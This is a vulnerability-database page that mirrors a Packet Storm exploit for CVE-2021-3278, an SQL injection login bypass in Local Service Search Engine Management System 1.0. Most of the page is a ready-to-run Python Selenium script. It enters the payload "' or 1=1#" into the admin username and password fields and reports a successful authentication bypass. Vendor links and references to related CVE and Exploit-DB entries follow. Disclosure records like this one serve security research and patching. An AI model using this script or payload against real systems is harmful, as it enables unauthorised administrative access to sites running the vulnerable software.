Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:162919
HistoryJun 02, 2021 - 12:00 a.m.

Local Service Search Engine Management System 1.0 SQL Injection

2021-06-0200:00:00
nu11secur1ty
packetstormsecurity.com
108
JSON
`# Exploit Title: SQL injection, bypass the login page, Local Service Search Engine Management System 1.0  
# Author: @nu11secur1ty  
# Testing and Debugging: @nu11secur1ty  
# Date: 06.02.2021  
# Vendor: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html  
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip  
# CVE: CVE-2021-3278  
# Proof: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug: @nu11secur1ty  
# CVE: CVE-2021-3278  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://192.168.1.4/lssems/admin/login.php"  
  
#enter your login username SQL bling injection  
username="nu11secur1ty' or 1=1#"  
#enter your login password SQL bling injection  
password="nu11secur1ty' or 1=1#"  
  
# test and proof the SQL injection  
# user: admin  
# password: password  
  
#enter the element for username input field  
element_for_username="username"  
#enter the element for password input field  
element_for_password="password"  
  
#enter the element for submit button by class  
element_for_submit="btn-sm.btn-block.btn-wave.col-md-4.btn-primary"  
  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
time.sleep(3)  
signInButton = browser.find_element_by_class_name(element_for_submit)  
signInButton.click()  
  
print("payload is deployed NOW, you have SQL Authentication Bypass =)...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
---------------------------------  
  
# Exploit Title: SQL injection, bypass the login page, Local Service Search  
Engine Management System 1.0  
# Date: 06.02.2021  
# Exploit Authotr idea: @nu11secur1ty  
# Exploit Debugging: @nu11secur1ty  
# Vendor Homepage:  
https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html  
# Software Link:  
https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip  
# Steps to Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278  
`

Related

cve 1
cnvd 1
prion 1
exploitdb 1
cve
cve
CVE-2021-3278
2021-01-26 18:16:00
cnvd
cnvd
Local Service Search Engine Management System SQL Injection Vulnerability
2022-02-18 00:00:00
prion
prion
Sql injection
2021-01-26 18:16:00
exploitdb
exploitdb
Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
2020-12-02 00:00:00
JSON
Related for PACKETSTORM:162919
cve1cnvd1prion1exploitdb1